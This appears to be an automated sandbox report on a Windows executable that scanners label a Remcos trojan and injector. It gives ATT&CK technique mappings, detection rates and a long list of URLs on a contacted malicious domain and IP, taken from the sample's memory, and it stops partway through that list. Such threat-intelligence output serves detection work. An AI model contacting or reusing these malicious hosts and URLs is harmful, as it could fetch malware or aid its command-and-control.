                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_0493CFA4 LdrInitializeThunk,

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Software Packing                		OS Credential Dumping1
                System Information Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                DLL Side-Loading                		LSASS Memory1
                Remote System Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
                Non-Application Layer Protocol                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
                Ingress Tool Transfer                		SIM Card SwapCarrier Billing Fraud

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ncIpox4w8f.exe52%VirustotalBrowse
                ncIpox4w8f.exe55%ReversingLabsWin32.Trojan.Remcos
                ncIpox4w8f.exe100%AviraTR/Injector.ikbgv

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.ncIpox4w8f.exe.2a34530.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                vervain.co.in8%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskny0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e0%Avira URL Cloudsafe
                http://www.pregrad.net0%VirustotalBrowse
                http://www.pregrad.net0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/le0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/pe0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskust0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk20%Avira URL Cloudsafe
                https://vervain.co.in/K0%Avira URL Cloudsafe
                https://vervain.co.in/N0%Avira URL Cloudsafe
                https://vervain.co.in/E0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskny0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.10%Avira URL Cloudsafe
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaima0%Avira URL Cloudsafe
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk100%Avira URL Cloudmalware
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk20%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0%Avira URL Cloudsafe
                http://www.pregrad.netopenU0%Avira URL Cloudsafe
                https://vervain.co.in/j0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.10%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y0%Avira URL Cloudsafe
                https://vervain.co.in/c0%Avira URL Cloudsafe
                https://vervain.co.in/h0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk20%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskity0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0%Avira URL Cloudsafe
                https://vervain.co.in/a0%Avira URL Cloudsafe
                http://www.emerge.deDVarFileInfo$0%Avira URL Cloudsafe
                https://vervain.co.in/0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk4.1.10%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe0%Avira URL Cloudsafe
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm0%Avira URL Cloudsafe
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm0%Avira URL Cloudsafe
                http://www.emerge.de0%Avira URL Cloudsafe
                https://vervain.co.in/pe0%Avira URL Cloudsafe
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.10%Avira URL Cloudsafe
                https://vervain.co.in/t0%Avira URL Cloudsafe
                https://vervain.co.in/rpriseCertificates0%Avira URL Cloudsafe
                https://vervain.co.in/le0%Avira URL Cloudsafe
                https://vervain.co.in/roso0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                vervain.co.in
                		199.79.62.221
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsktrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://vervain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskityncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimaovwatvsknyncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk9encIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.pregrad.netncIpox4w8f.exe, ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/ain.co.in/lencIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/ain.co.in/pencIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.250684430.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/ain.co.in/ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2yncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9encIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2tncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskustncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk24encIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/KncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280241715.000000000080F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/NncIpox4w8f.exe, 00000000.00000003.401161238.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.405146329.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382108941.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416691334.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.435949378.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.393118648.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.411977070.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443210600.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433570492.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.483953097.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/EncIpox4w8f.exe, 00000000.00000003.303406339.000000000080F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9encIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvsknyncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimancIpox4w8f.exe, 00000000.00000003.340893762.0000000000809000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimaovwatvskncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, 